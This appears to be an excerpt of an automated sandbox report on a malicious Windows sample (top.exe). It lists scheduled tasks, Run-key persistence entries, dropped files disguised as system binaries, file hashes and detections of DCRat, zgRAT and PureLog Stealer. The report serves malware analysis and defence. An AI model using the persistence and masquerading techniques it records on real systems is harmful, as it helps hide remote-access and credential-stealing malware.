                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWinPerfcommon.exe, 00000006.00000002.2427021597.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            No contacted IP infos

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1589198
                                                            Start date and time:2025-01-11 16:24:11 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 6s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:65
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Sample name:top.exe
                                                            Detection:MAL
                                                            Classification:mal100.spre.troj.expl.evad.winEXE@52/63@0/0
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 57%
                                                            • Number of executed functions: 210
                                                            • Number of non-executed functions: 109
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): Conhost.exe, SystemSettings.exe, dllhost.exe, OfficeClickToRun.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fsin.top
                                                            • Execution Graph export aborted for target WinPerfcommon.exe, PID 1020 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            10:25:42API Interceptor176x Sleep call for process: powershell.exe modified
                                                            16:25:39Task SchedulerRun new task: OfficeClickToRun path: "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:25:39Task SchedulerRun new task: OfficeClickToRunO path: "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:25:39Task SchedulerRun new task: SystemSettingsS path: "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:25:39Task SchedulerRun new task: WmiPrvSE path: "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:25:39Task SchedulerRun new task: WmiPrvSEW path: "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:25:39Task SchedulerRun new task: wnSgpBKJabSHvDawwFjyhiOtGEGVta path: "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:25:39Task SchedulerRun new task: wnSgpBKJabSHvDawwFjyhiOtGEGVtaw path: "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:25:42Task SchedulerRun new task: SystemSettings path: "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:25:42Task SchedulerRun new task: WinPerfcommon path: "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:25:42Task SchedulerRun new task: WinPerfcommonW path: "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:25:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:25:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:26:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:26:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:26:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:26:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:26:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:26:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:26:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:27:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:27:14AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:27:23AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:27:31AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:27:40AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:27:49AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASNs

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeWinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              C:\Program Files\MSBuild\Microsoft\SystemSettings.exeWinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                Created / dropped Files

                                                                C:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):1168
                                                                Entropy (8bit):4.448520842480604
                                                                Encrypted:false
                                                                SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                Malicious:false
                                                                Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.938445843037243
                                                                Encrypted:false
                                                                SSDEEP:48:6zmttVxZ8RxeOAkFJOcV4MKe28dedZzOvqBHHuulB+hnqXSfbNtm:/KxvxVx9Jvk5TkZzNt
                                                                MD5:C137E4E4299D48A19B11A596DFA8A20A
                                                                SHA1:1FDED2B159D9A33FE125492418F08F5914A64914
                                                                SHA-256:B34EEDA908DDFC77878EDB3C48093E1C9738541208AE4A5A894B641EB5641F2B
                                                                SHA-512:A2D7215268E4C6FEDD9318A20FAE767E7924C28644DE02D9CB9FB92B5E04088F95825898E9F159FCF7C8A9B63CD359B54B4A961FF1E909D00BEAE5B143C8EE78
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..\.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.,.......#GUID...<... ...#Blob...........WU........%3................................................................

                                                                C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                • Antivirus: Virustotal, Detection: 70%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                C:\Program Files (x86)\Windows Portable Devices\e6c9b481da804f

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):293
                                                                Entropy (8bit):5.782944238729157
                                                                Encrypted:false
                                                                SSDEEP:6:aReuYy/9oHDMWjiaR+NdR2noXY6utwTpVxQcV7VUeWDmHA:aReupoJ+RhYtAxQ27VUJDmHA
                                                                MD5:C7F106CF3F226F436E83C92DDD139870
                                                                SHA1:F589646B859817BBC6A806F84EA2A3794C1BB5BB
                                                                SHA-256:447327F237EFF1EA1EFBFC39F34D47FC18826D491A82F4EBD3ACF95904FB268F
                                                                SHA-512:3575B551B3C8A485836BABEA6FE78EFF18FC38C2EC7E865A075D205C5418CBE7B08D77F2976EDF1C5B35AB7D4163C0B61E852E449DE3FBC735CDFB3B28558C4A
                                                                Malicious:false
                                                                Preview:4Nm4037jefMIxlidUxsfuzWXJefSvF4BSltzJ6fNgCMItmFAxuJCKKhE1OvWYpyYlK0M1tTYSe8rnOogZffB510IDp84LJz1Oygiv2IDavupL0bnjO72KwctUsIMvZNIpGcyrGugWblKHK6NOUV6M6rbVwNDu6SBilAFXm5ddagsLSmJv57aDQ6tYBd42rvaIklgK1zmZ1dva8PCKDSy817SoRqWIBkwpFjlrF94GVBMxLSZvatyY6bRmT22LcdXRqGUZoVFDXsn0ved8QlrSvXsnS8YNGsn1n4GF

                                                                C:\Program Files\MSBuild\Microsoft\9e60a5f7a3bd80

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with very long lines (348), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):348
                                                                Entropy (8bit):5.778808567693445
                                                                Encrypted:false
                                                                SSDEEP:6:+S/O+zRNBadqcwEG00wY2mdr+uZIJ9P7CT0EBuCkv4EFId0OMc7VjnG1CQGvP4dD:tG+zTBSnwEFNmVw9PI0EBwVOMOZG8vAl
                                                                MD5:CDEEF638CA590517B8DBA031F17DB71D
                                                                SHA1:CAB0DED8A04FC44FB7F49FDDDF44E438B45A633A
                                                                SHA-256:E19384DA0420D5E14EDF3A0ECF443B3CE779178E6D2E8FC620246D1EFB7FC653
                                                                SHA-512:FDCE5B3405B05A71CEDE9C45138276C345987922AF05ED9133A9E3FE18B8769033D27BA35C96CC23F9763F4429BF69D6D0FC3497E828DBA19C71E528FED637A6
                                                                Malicious:false
                                                                Preview:XGs96qJnfpE4wRe5FFI5kql6zM1VJl3853CtKe2itiKGMYwggeJLQGurevKuyxe3vG93OuvkNkLCfftbaUzpcrryJVPYUIu6EQVFY3Svti8q4rL9CsTe8ybDYKu3fWQE0P8OJoChCD63tB3bJPWlyP7PzRqOIYPWS30pt7zXqwb42hUXQTuQAoQkSsY27xYoyjlzLOrMZ85ByCWS7T7zo9VnnQWAi7a2YxGS6eMCli0CtOvQVG5n0i9zO7M51rnchCnA6EWcG5OGIT3YeGocBwCzxQE8RRK44XerkvTRuch4U3q4DxavCLbuAxNp9XKzvULvzMytwXrjPHf3kJ4e0Z2t6tqx

                                                                C:\Program Files\MSBuild\Microsoft\SystemSettings.exe

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                • Antivirus: Virustotal, Detection: 70%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                C:\ProgramData\WindowsHolographicDevices\SpatialStore\24dbde2999530e

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):118
                                                                Entropy (8bit):5.4913035111862
                                                                Encrypted:false
                                                                SSDEEP:3:VRF3EGwkY44/0qVtL4WgHhkEpEv4sdO3wTqyIXLK:iGwh44ttL4Z1KgsdOATHWK
                                                                MD5:542C80268C16D6CE54DB817D7D76F77A
                                                                SHA1:A8B1DE0B4C708BDDB1C70C592169B4D9489C5214
                                                                SHA-256:3FF17CECAA79275324BB681F5A64A2F366F249D2511726739FA1986642CFD5A7
                                                                SHA-512:BA89998D530C4D82430F0F750111737072FC45F77D8A30434C9F60D2ADC1AF0C66DB54169D5BA75C6F22FB9556F2524338B69856B61E1F168E8D81583A55DEC5
                                                                Malicious:false
                                                                Preview:YJG2tmwL0WhspxNuHQkI8Q8V8suNU241s7IiS4Uv57nZQtmnhFQqpjHHLv3B1i08bq9spobN5yNAmiEPGGqPlOLJzAXhAT4WHp8kt482nCv1VHemro5u2l

                                                                C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                • Antivirus: Virustotal, Detection: 70%, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                C:\Recovery\a5e29c0f5e55d1

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with very long lines (377), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):377
                                                                Entropy (8bit):5.813984273872232
                                                                Encrypted:false
                                                                SSDEEP:6:+jNF8wgrUro61UpYMYPoUUT9P2STsOvtgtPjLBRlIZ9LHvd7cPEGG/c26vya7PVB:+RKoUiMYK2UGP3BzInLvdY5G0lvyaLVB
                                                                MD5:E7C7B64B5C4958F6B0857FE2184EF68B
                                                                SHA1:7086069BA4244C8C67191F2580ED1CEB84B49294
                                                                SHA-256:ADB8EE0C969B2ED583A26C7999E87F2379C0F4A685866033F982FD70D1136AEB
                                                                SHA-512:28815DB7510FB88112ACD52CF2968D56114D7669E07DDDF16C8B0D37B67F775B6ED80F0393D6FF4710E7FE4BF89133AF7B000C887EECAC6653E244C41166EC0E
                                                                Malicious:false
                                                                Preview:RE5UzJFqiFC0IFKCaUAO40LeTEI8dCHkqhaqsLPpdCQo9h0TlIRTF6cb2aBuAHMf7cJloeUPFVu1jgfwOzWUvyetE9xSJeoW0vqgXOpHyBNuLl1W4PgLu1uJ7ZgpqCFlqYAyz9Y9JPgtkuicHbY47dl8Bhi7rAaw6mDxkDg40gBeVAjN1EhPnKnNwCxSaaRJzux7qu1E5dDbbHmA8VFncKIv9zBiQNdaO2plNlgHMdUKGMwpZwUFUoqolB81tTyr9nMjbBxWy8a908pxDWId3YFkLB9LnpY3omKd9MNY97RWNqxnWKxXKUylilXaBltJkhUNxLx0Iue5HtWeNVzc1BsUyj4YyxWXNHwqVj0KX7Oa02ezP3MqvRSjy

                                                                C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
